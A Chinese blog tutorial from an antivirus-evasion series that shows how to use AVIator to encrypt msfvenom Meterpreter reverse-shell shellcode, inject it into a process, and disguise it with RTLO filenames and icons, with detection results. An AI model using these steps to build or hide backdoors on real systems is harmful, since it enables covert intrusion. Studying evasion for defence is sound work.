远控免杀专题(14)-AVIator(VT免杀率25/69)

声明：文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！

本专题文章导航

1、远控免杀专题(1)-基础篇：https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg

2、远控免杀专题(2)-msfvenom隐藏的参数：https://mp.weixin.qq.com/s/1r0iakLpnLrjCrOp2gT10w

3、远控免杀专题(3)-msf自带免杀(VT免杀率35/69)：https://mp.weixin.qq.com/s/A0CZslLhCLOK_HgkHGcpEA

4、远控免杀专题(4)-Evasion模块(VT免杀率12/71)：https://mp.weixin.qq.com/s/YnnCM7W20xScv52k_ubxYQ

5、远控免杀专题(5)-Veil免杀(VT免杀率23/71):https://mp.weixin.qq.com/s/-PHVIAQVyU8QIpHwcpN4yw

6、远控免杀专题(6)-Venom免杀(VT免杀率11/71):https://mp.weixin.qq.com/s/CbfxupSWEPB86tBZsmxNCQ

7、远控免杀专题(7)-Shellter免杀(VT免杀率7/69)：https://mp.weixin.qq.com/s/ASnldn6nk68D4bwkfYm3Gg

8、远控免杀专题(8)-BackDoor-Factory免杀(VT免杀率13/71)：https://mp.weixin.qq.com/s/A30JHhXhwe45xV7hv8jvVQ

9、远控免杀专题(9)-Avet免杀(VT免杀率14/71)：https://mp.weixin.qq.com/s/EIfqAbMC8HoC6xcZP9SXpA

10、远控免杀专题(10)-TheFatRat免杀(VT免杀率22/70)：https://mp.weixin.qq.com/s/zOvwfmEtbkpGWWBn642ICA

11、远控免杀专题(11)-Avoidz免杀(VT免杀率23/71)：https://mp.weixin.qq.com/s/TnfTXihlyv696uCiv3aWfg

12、远控免杀专题(12)-Green-Hat-Suite免杀(VT免杀率23/70)：https://mp.weixin.qq.com/s/MVJTXOIqjgL7iEHrnq6OJg

13、远控免杀专题(13)-zirikatu免杀(VT免杀率39/71)：https://mp.weixin.qq.com/s/5xLuu5UfF4cQbCq_6JeqyA

14、远控免杀专题(14)-AVIator(VT免杀率25/69)：本文

文章打包下载及相关软件下载：https://github.com/TideSec/BypassAntiVirus

---

免杀能力一览表

几点说明：

1、上表中标识 √ 说明相应杀毒软件未检测出病毒，也就是代表了Bypass。

2、为了更好的对比效果，大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。

3、由于本机测试时只是安装了360全家桶和火绒，所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01)，火绒版本5.0.34.16(2020.01.01)，360安全卫士12.0.0.2002(2020.01.01)。

4、其他杀软的检测指标是在virustotal.com（简称VT）上在线查杀，所以可能只是代表了静态查杀能力，数据仅供参考，不足以作为免杀的精确判断指标。

5、完全不必要苛求一种免杀技术能bypass所有杀软，这样的技术肯定是有的，只是没被公开，一旦公开第二天就能被杀了，其实我们只要能bypass目标主机上的杀软就足够了。

---

一、AVIator介绍

AVIator使用AES加密来加密Shellcode，生成一个包含加密有效负载的可执行文件，然后使用各种注入技术将shellcode解密并注入到目标系统，从而绕过杀毒软件的检测。

二、安装AVIator

AVIator只有windows版，c#开发，单文件exe。

安装也非常方便，直接从github上下载下来。

git clone https://github.com/Ch0pin/AVIator

或者直接下载压缩包https://github.com/Ch0pin/AVIator/archive/master.zip

解压后在Compiled Binaries文件夹中有x86和x64的可执行exe文件，执行即可

使用也非常简单，只需要填入payload后简单设置一下就可以。

三、AVIator生成后门

首先要使用msf生成shellceode，需要基于c#，我就用msf生成一个最基础的

msfvenom -p windows/meterpreter/reverse_https  LHOST=10.211.55.2 LPORT=3333  -f csharp -o test11.c

在AVIator中对shellcode进行处理，AES KEY和IV默认就可以

payload地方填入上面生成的test11.c文件内容，然后点击Encrypt，生成加密后的payload。

目标操作系统架构根据实际情况选择就可以，x86比较通用一些。

下面还有个Injection Techniques，需要选择注入技术，我这选择第二个注入Notepad++进程

另外，软件还提供了RTLO选项，可以使可执行文件名看起来伪装性更好。比如，启用该选项后，文件testcod.exe将被保存文件名为testexe.doc，但文件还是可以正常被当做exe执行的。但是，选择了RTLO选项虽然更迷惑人，但也更容易被杀软报警告。

还可以自定义程序ico图标，增强伪装，我这就不配置了。

点击generate后就可以生成后门程序了。

不开杀软的时候可正常上线

打开杀软进行测试，可过360和火绒动静态检测

比较诡异的是360安全卫士的行为检测发现木马行为

但火绒和360杀毒没点反应，可正常上线

virustotal.com中30/69个报毒

后来我没启用RTLO选项又生成了一个正常的exe文件，看来RTLO选项影响还挺大。

virustotal.com中25/69个报毒

四、小结

参考

官方说明文档：https://github.com/Ch0pin/AVIator

扫描下方二维码学习更多安全知识：

Ms08067安全实验室

专注于普及网络安全知识。团队已出版《Web安全攻防：渗透测试实战指南》，《内网安全攻防：渗透测试实战指南》，目前在编Python渗透测试，JAVA代码审计和二进制逆向方面的书籍。

团队公众号定期分享关于CTF靶场、内网渗透、APT方面技术干货，从零开始、以实战落地为主，致力于做一个实用的干货分享型公众号。

官方网站：www.ms08067.com